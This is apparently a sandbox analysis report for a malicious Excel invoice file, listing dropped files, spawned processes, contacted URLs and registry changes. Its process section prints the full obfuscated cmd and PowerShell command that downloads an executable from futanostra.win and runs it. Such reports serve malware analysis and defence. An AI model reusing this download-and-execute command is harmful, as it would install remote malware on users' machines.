Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
fattura_062 (2).xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application:
Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date:
Wed Aug 9 12:45:36 2017, Security: 0
|
initial sample
|
 |
|
|
C:\Users\user\Desktop\fattura_062 (2).xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application:
Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date:
Wed Aug 9 12:45:36 2017, Security: 0
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\vtu5iubk.1hn.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xb5205sv.nxp.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF1697C7A2F71BDBF4.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF2ADC5968818B5C3C.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFC7F749FE99108E86.TMP
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\1E60F43C.tmp (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application:
Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date:
Wed Aug 9 12:45:36 2017, Security: 0
|
dropped
|
||
|
C:\Users\user\Desktop\3EE20000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Last Saved By: user, Name of
Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003,
Last Saved Time/Date: Thu Oct 31 13:14:46 2024, Security: 0
|
dropped
|
||
|
C:\Users\user\Desktop\3EE20000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
modified
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='wwj';$ji='wa.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess
''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject
';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='wwj';$ji='wa.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess
''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://futanostra.win
|
unknown
|
|
|
|
https://futanostra.win/foglio.ful
|
unknown
|
|
|
|
https://futanostra.wi
|
unknown
|
|
|
|
https://futanostra.win/foglio.fu
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
futanostra.win
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.168.2.255
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
e?/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1040
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28C58
|
28C58
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{11AD4CA7-9901-415F-912A-7431D64AADDD}\2.0
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{11AD4CA7-9901-415F-912A-7431D64AADDD}\2.0\FLAGS
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{11AD4CA7-9901-415F-912A-7431D64AADDD}\2.0\0\win32
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{11AD4CA7-9901-415F-912A-7431D64AADDD}\2.0\HELPDIR
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\TypeLib\{11AD4CA7-9901-415F-912A-7431D64AADDD}\2.0
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\TypeLib\{11AD4CA7-9901-415F-912A-7431D64AADDD}\2.0\FLAGS
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\TypeLib\{11AD4CA7-9901-415F-912A-7431D64AADDD}\2.0\0\win32
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\TypeLib\{11AD4CA7-9901-415F-912A-7431D64AADDD}\2.0\HELPDIR
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
|
NULL
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
lj/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2EFEA
|
2EFEA
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
